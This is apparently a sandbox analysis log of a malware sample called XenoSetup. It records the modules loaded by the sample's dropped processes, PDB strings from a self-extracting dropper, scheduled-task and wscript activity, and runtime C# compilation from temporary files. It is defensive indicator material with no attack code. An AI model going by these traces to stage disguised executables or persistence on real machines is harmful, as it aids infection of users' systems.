Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: version.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: wldp.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: amsi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: userenv.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: profapi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: version.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: wldp.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: amsi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: userenv.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: profapi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: rasman.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: mscoree.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: kernel.appcore.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: version.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: uxtheme.dll
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Section loaded: wldp.dll

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: XenoSetup(2).exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: XenoSetup(2).exe.bin.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: XenoSetup(2).exe.bin.exe

Static file information: File size 16777216 > 1048576

Source: XenoSetup(2).exe.bin.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x377e00

Source: XenoSetup(2).exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: XenoSetup(1).exe, 00000006.00000000.2342774589.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000000.2466239028.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000002.2471884148.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000000.2546623626.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000002.2557207188.0000000001013000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbmmmGCTL source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Xeno.exe

Code function: 7_2_00007FF68D5ECB70 LoadLibraryA,GetProcAddress,_invalid_parameter_noinfo_noreturn,

7_2_00007FF68D5ECB70

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

File created: C:\portBrokerDll\__tmp_rar_sfx_access_check_6546781

Jump to behavior

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Code function: 0_2_00007FFD348B00BD pushad ; iretd	0_2_00007FFD348B00C1
